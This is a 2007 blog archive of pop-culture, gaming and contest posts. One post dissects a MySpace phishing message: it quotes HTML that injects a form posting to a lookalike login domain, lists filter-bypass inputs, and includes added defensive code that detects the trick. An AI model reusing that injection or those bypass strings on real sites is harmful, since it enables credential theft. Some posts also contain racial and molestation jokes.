
Archive for April, 2007

Some tool at MSNBC, the former network of Don Imus, and current network of Chris Matthews, put out a poll asking what TV shows deserve to be cancelled.

This poll is not that interesting, because it’s not statistically relevant, but it’s interesting for other reasons.

First, the choice of shows on the poll. Go ahead, take a look. Notice anything odd?

I don’t see one reality show on that whole list. Not one! While I think According to Jim is about as funny as the kids at the Imus ranch, it beats the typical reality show crap by far.

So, besides reality shows (which could all be cancelled tomorrow and I wouldn’t shed a tear) what should be cancelled according to the results of this worthless poll?

  • Lost (15%)
  • ER (12%)
  • The Simpsons (12%)
  • Desperate Housewives (11%)
  • According to Jim (6.7%)

Two of these shows, ER and Simpsons, probably do need to be cancelled, just because they’ve been on too long. Though I’m not really a fan of either, so who knows.

According to Jim is just tripe. Away with it.

What shocked me was that Lost is on the top of the list. The third season isn’t even over, there’s still a ton of questions and interesting stories left, and I think it’s still a great show. Yeah, the ratings have dipped down a bit thanks to American Idol and a new timeslot, but are TV viewers really done with Lost?

I highly doubt it. As I stated before, the sample is heavily biased–this is an unscientific poll. I still find it incredible that out of all the shows on that list, Lost is #1. Thoughts?

Missed the last Tuesday Tube? Head over to the tag search for ‘tuesday tube’ and browse through the archives.

This week on Tuesday Tube: A new RiffTrax preview; this time one of my favorites gets the business. And, completely unrelated to Star Wars or RiffTrax, a couple of clips featuring David Byrne, founder of the Talking Heads.

Frankly, I like all the Star Wars movies, even the ones that are popular to hate. Fanboy? Yes. Even if you don’t agree, I think that any movie is enhanced by the presence of the former cast of MST3K. Here is a clip from the new Episode 2 RiffTrax:

Talking Heads were a pretty awesome 80s group, fronted by David Byrne. Here’s a video for my favorite song from the Heads, “Once in a Lifetime”:

And finally, another clip featuring David Byrne. This one is for Joe. JOE! YOU’RE BRINGIN’ ME DOWN, MAN!

The Do Not Want contest is now underway!

The field is still wide open, as we have only three participants so far.

Here’s the list:

  • WelfareHero
  • Minywheats
  • Stan Hooper

Leave a comment below with your gamertag if you want to join the contest. There’s still plenty of time!

I purchased Super Paper Mario this weekend.

This is actually the first game that I’ve purchased for the Wii, and I did so without even waiting to rent it or try it out.

Let it be known that I am a hater of the original Paper Mario for n64. I rented it, played it for about 2 hours, and then just about threw it out the window. It was terrible. I hated it.

So why did I pick up Super Paper Mario without even playing it?

First, sometimes you just have to follow your heart. I love Mario games, and I have owned just about all of them at one time or another.

Second, this game is not a turn-based RPG. It is an action RPG based around platforming. I’m thinking Mario meets Symphony of the Night.

Third, the 2d-to-3d stuff is really cool. Kinda like the dark-to-light world stuff in Zelda III.

So. I played about 5 levels into the game (as far as I know there are 7, but there are probably more). The game is definitely better than Paper Mario, but that’s like comparing it to limb amputation. It’s better, sure, but what isn’t?

Graphically, it’s very crisp, but very simple. Lots of plain colored shapes and thick lines. As if the game was actually made of paper. The new characters/enemies in the game have a distinctive style, one that I’m not too fond of, but it’s not terrible.

The gameplay–the platforming–is very very good. It’s different from past Mario platformers, but not too much. Figuring out the puzzles is fun as well, but I really wish there was more platforming action. I guess what I really want, is “New Super Mario Bros” for Wii. This is not that.

The dialog/writing for the game is downright hilarious. There’s a whole chapter of the game devoted to making fun of hardcore gamers/fanboys. Lots of third-wall type jokes, and tons of references to just about every Mario game ever made, up to and including Galaxy. If you rush through and don’t read the text, you’re missing out on about half of what makes this game worth playing.

The sound is passable. The music isn’t particularly memorable, except when you get a star and become “giant” Mario (or Princess or Bowser). The text-typing noise is really annoying at first, but I’ve gotten past that.

Verdict: probably not worth $50, but definitely worth playing. I’d wait until you could find a copy at $30-$40 before purchasing. Also, if you are incredibly skilled at gaming, I would just rent or borrow. This game won’t take you long to finish (at least, as far as I can tell).

Today is the 60th anniversary of the first black player in Major League Baseball: Jackie Robinson.

In honor of Jackie Robinson, Ken Griffey, Jr. is wearing #42, Robinson’s number, during the game today.

Irish Elk also shares a neat story about Jackie Robinson’s days in the minor leagues before the call-up to the Dodgers.

And now, some racial humor, in memory of Don Imus, who isn’t dead.

Elaine from Airplane

Stewardess: Would you gentlemen care to order your dinners?

Jive talkers from Airplane

Jive dude: Bet, babe. Slide a piece o’ da’ porter. Drink side, run da’ java.

Jive man: Hey lookie here. I can dig grease ‘n chompin’ on some butter and draggin’ through the garden.

Episode 6 of the Do Not Want podcast has been posted in the usual places.

We are also happy to announce that we have started the first Do Not Want Contest!

For full contest details, just check out the Episode 6 show notes, but here’s the general gist:

  • Email any one of us at webmaster@mgroves.com, dreadhead@jards.com, or lbusler@50pixelsofevil.com.
  • Email is the preferred method, but you can also just leave a comment below if you want to. Your gamer tag is all we really need, but your name and email address would be useful too.
  • If you don’t leave a comment below, just leave a comment on one of the other blogs: The Daily Priapism, or 50 Pixels of Evil.
  • If you don’t want to do any of the above…well, uh, smoke signals? Carrier pigeon? Whatever–just get us your gamer tag somehow!

Once we have all the gamer tags, at 5pm on April 16th, we will take a snapshot of your current achievement points. We will take another snapshot on May 1st, 2007. The gamer who has gained the largest amount of points in the meantime will be the winner!

Prize(s):

  • The first place winner is guaranteed to receive a 3 Month Xbox Live Gold membership for you to use or to extend your current membership.
  • There are no other prizes for sure at this point (this is only the first contest after all), but we will definitely try to throw something else in for the 1st-3rd place winners. Autographed pictures, or CDs of our podcasts, or whatever. Got something you want to give away? Used carpets, old toasters, some pocket lint? Contact us!

You are free to enter the contest after the April 16th start date, but no entries will be accepted after May 1st at 5pm. Cuz that’s when the contest ends. Duh. Please email one of us if you have any questions at all so we can supply additional confusion.

It takes a big man to admit that he screwed up. At least, that’s what I tell myself.

MySpace is the cesspool of the intertubes: angsty teens, dopey high schoolers, awful musicians, spammers, scammers, griefers, hackers, the rock stupid, and me.

MySpace hacks are nothing new. ha.ckers.org comes
across vectors all the time, due to lazy or ignorant programming on behalf of MySpace. Phishing
isn’t new either. A web developer and long-time user of the web shouldn’t fall prey
to either of these attacks. But I did.

Now let me show you how simple the attack was, and how to do it yourself.

Let’s start with the catalyst. A simple message in my MySpace inbox.

MySpace Phish

See anything out of the ordinary? Look again:

MySpace Phish

That form is not submitting to MySpace.com. Chances are, you wouldn’t even think to check the URL that the form submits to. After all, this form is definitely on MySpace.com, and why would their form submit to anything else? (Hindsight is making me feel real dumb at this point).

It turns out that changing the form URL is incredibly easy, or at least it was a day or two ago. Here’s the HTML that makes up the message you see above:

<form action="http://messanger.myspace.com/[...whatever...]">
  [....snip....]
  <table class="messageTable">
    <tbody>
      <tr> <th>From:</th> <td> [...snip...] </td> </tr>
      <tr> <th>Date:</th> <td> <span class="left">Apr 11, 2007 1:17 PM</span><br /> [...snip...]<br /> </span> </td> </tr>
      <tr> <th>Subject:</th> <td>wtf….dont bother me!</td> </tr>
      <tr> <th>Body:</th> <td>
</form>
<form
action="
http://login-myspace-viewmessage-mytoken-daw83kz.com/login.cfm.php
">
You !@#$ little punk !@#$!
      </td> </tr>
    </tbody>
  </table>
  [.....snip....]
  <input type="submit" value="-Reply-" name="whatever" />
</form>

If you are familiar with HTML forms, then you can see exactly what the problem is.
Whoever wrote the message wrote a “close form” tag (</form>) and opened a
new form tag (<form action="http://login-myspace-viewmessage-mytoken-daw83kz.com/login.cfm.php">).
Since there were already “open” and “close” form tags on the page,
the phisher simply broke the form into two pieces, with the 2nd form capturing
the buttons at the bottom of the page, and submitting to a URL of his choosing.
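
A check a site owner could run over a rendered message page to catch this split, as an added example that is not part of the original post: it tracks which form is open when each submit button appears and reports buttons that post off-site. The sample markup, the `login-myspace.example` host, the `/reply` path and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample modelled on the message page above (placeholder host).
SAMPLE = """<form action="http://messanger.myspace.com/reply">
<table><tr><th>Body:</th><td>
</form> <form
action="
http://login-myspace.example/login.cfm.php
">
You little punk!
</td></tr></table>
<input type="submit" value="-Reply-" name="whatever" />
</form>"""

class SubmitOwner(HTMLParser):
    """Record the action of whichever <form> is open at each submit button."""
    def __init__(self):
        super().__init__()
        self.in_form = False
        self.action = None
        self.submits = []                      # (button value, form action)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and not self.in_form:  # browsers ignore a nested <form>
            self.in_form = True
            self.action = (a.get("action") or "").strip()
        elif tag == "input" and (a.get("type") or "").lower() == "submit":
            self.submits.append((a.get("value"), self.action if self.in_form else None))

    def handle_endtag(self, tag):
        if tag == "form":                       # an injected </form> ends the site's form
            self.in_form = False
            self.action = None

def off_site_submits(page_html, trusted="myspace.com"):
    """Return (button, host) for submit buttons whose form posts off the trusted domain."""
    parser = SubmitOwner()
    parser.feed(page_html)
    flagged = []
    for value, action in parser.submits:
        host = urlsplit(action or "").hostname or ""   # empty host: relative action
        if host and host != trusted and not host.endswith("." + trusted):
            flagged.append((value, host))
    return flagged
```

On the constructed sample the `-Reply-` button is reported as belonging to the injected form, which is exactly the capture described above.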

Okay, so big deal, the form goes to some other URL. Why
is that a problem? The exploit here is that most users don’t expect to be
hurtled off of MySpace at that point, which means that if the page they
are hurtled to looks exactly like a MySpace login screen, then that user is
likely to enter their login and password without a second thought. At this point,
the phisher collects a login/password to your account, which means he can send spam,
send more phishing attempts out, vandalize your site, or pretty much do anything
he wants with your MySpace account.

Now maybe you’re thinking: this attack seems too easy, too obvious. And
you’re right. MySpace allows HTML to be used in these messages, which is
fine, except they don’t filter out potentially problematic HTML, or don’t
filter it out well.

In fact, MySpace is notorious for this type of lazy code. Let’s say you were a really naive
programmer, or stupid, or whatever. If you saw this “</form>” problem, and were tasked
with fixing it, what might you do? Maybe just remove “</form>” from all user input before
sending the message? That’ll work right? Wrong. What if the phisher typed in one of the
following?

  • </fo</form>rm>
  • &lt;/form>

Your find & remove idea wouldn’t work!
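
The two inputs above run through the find & remove filter and through output escaping, as an added example that is not code from the original post or from MySpace. The function names are hypothetical, and the entity-decoding step after filtering is an assumption about how the second input could get through.

```python
import html
import re

PAYLOADS = ["</fo</form>rm>", "&lt;/form>"]   # the two inputs listed above

FORM_TAG = re.compile(r"</?\s*form\b", re.IGNORECASE)

def has_form_tag(markup):
    """True if the markup a browser receives contains a real form tag."""
    return bool(FORM_TAG.search(markup))

def naive_strip(text):
    """The find & remove fix: one pass deleting the literal closing tag."""
    return text.replace("</form>", "")

def strip_until_stable(text):
    """A second attempt: repeat the removal until nothing changes."""
    previous = None
    while previous != text:
        previous, text = text, text.replace("</form>", "")
    return text

def rendered_after_decode(text):
    """Assumed later pipeline step that decodes entities after filtering."""
    return html.unescape(text)

def escape_for_output(text):
    """Hardened form: escape at output so user text can never become markup."""
    return html.escape(text, quote=True)

def audit():
    """Map each payload to whether a form tag survives each approach."""
    results = {}
    for p in PAYLOADS:
        results[p] = {
            "naive": has_form_tag(rendered_after_decode(naive_strip(p))),
            "looped": has_form_tag(rendered_after_decode(strip_until_stable(p))),
            "escaped": has_form_tag(escape_for_output(p)),
        }
    return results
```

Looping the removal handles the nested input but not the entity-encoded one; escaping at output neutralizes both because no `<` from user text reaches the page. A site that wants to keep some HTML in messages needs an allowlist sanitizer built on a real parser rather than string removal.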

Anyway, I could write a lot more about this, but sites like ha.ckers.org
do a much better job.

Let me just show you that I did the same phishing attack in about 2 minutes (I sent my own
account a phishing attempt):

MySpace Phish

Notice the address at the bottom.

So what’s the point of all this? It’s to show you that phishers aren’t just dumb script kiddies
interested in pranking–they are intelligent, dedicated hackers intent on making a buck. It’s also
to show you that a clever phishing attempt can fool anyone, from “dumb” average users, to
“smart” IT professionals.

Though I suppose this whole article could just be an attempt to cover my shame. Man, I feel
stupid!

37Signals challenged its readers to define what the “real world” is in 10 words or less. As usual for the internet, there were a lot of jaded, pessimistic comments, but there was also some real insight, some clever gems, and some funny one-liners.

Here are some of my favorites…

  • “The world where people send 80 MB email attachments.” This was just mentioned at work today…
  • “Internet Explorer 6” This implies so much with only 3 words. The real world is never what you want it to be, while others can’t understand why it needs to be anything else. IE6 is now being phased out, but what was conveyed here is still true. Another user put it, “A place where most of the time, you don’t get your way.” But that’s not less than 10 words.
  • “Hindsight is for blind visionaries.” So true.
  • “In theory there is no difference between theory and practice. But, in practice, there is.” Okay, so this is what I submitted, and it’s not 10 words or less, but I think this is a really clever quote.
  • “Mostly harmless.” I love the reference.
  • “In the real world, you aren’t limited to 10 words.” Look at a lot of the comments: some people just can’t stand constraints. This guy worked within the constraints to criticize them.
  • Adam from Mythbusters: “I reject your reality and substitute my own.” I’ve always liked that quote.
  • “Where college professors work before they go into education.” Yeah, if you’re lucky.

Missed the last Tuesday Tube? Head over to the tag search for ‘tuesday tube’ and browse through the archives.

This week on Tuesday Tube, a broken leg, a song about private parts, and a smoke monster! What’s the unifying theme here? Fear, I guess. Fear of breaking a leg while trying to escape from a smoke monster singing about his crotchular region. So watch the videos, or I’m gonna run over your knees with my bike!

Whenever anyone says that pro wrestling is “fake”, I sometimes correct them by saying that it’s not fake: It’s staged. Yeah, there are pulled punches and what not, but these guys take real physical abuse and put themselves at risk every night, just like “real” athletes. Here’s Sid Vicious, breaking his leg on television, which I remember watching live:

Sometimes I ask crazy “what if” questions, just to get my rusty synapses going. Here’s one: What if Henry Winkler starred in a PSA about child molestation? I think it would go a little something…like this:

Please keep your comments on the above video as clean as is possible. Also, for added fun, try watching the video again without laughing or feeling uncomfortable. Statistics say that 95% of you can’t (the other 5% are child molesters).

If you don’t watch Lost, well, you’re missing out. Here’s the best look we’ve had at the smoke monster (Cerberus?) in a while, and we also find out what the fence does (besides melt your brain).

We don’t know what it is, but we know it doesn’t like our fences.